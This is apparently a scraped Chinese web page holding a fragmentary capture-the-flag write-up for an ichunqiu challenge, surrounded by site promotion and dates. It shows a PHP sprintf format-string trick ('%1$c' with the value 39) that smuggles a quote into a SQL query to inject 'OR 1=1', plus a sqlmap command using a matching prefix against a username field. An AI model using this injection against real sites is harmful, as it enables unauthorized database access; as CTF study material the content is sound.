在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
URL:http://efa4e2c2b8df4ce69454639f4e3727071652c31167f341a4.game.ichunqiu.com/ 简单的说就是sprintf中 还有一个sprintf漏洞的利用方式: 1 <?php 2 3 $input1 = '%1$c) OR 1=1 #'; 4 $input2 = 39; 5 $sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s"; 6 $sql = sprintf($sql, $input2); 7 echo $sql; 8 ?> 在这题中, 虽然是post sqlmap -r /home/1.txt -p username --prefix="%1$'"
|
2022-08-17
2022-11-06
2022-08-17
2022-07-29
2022-07-18
请发表评论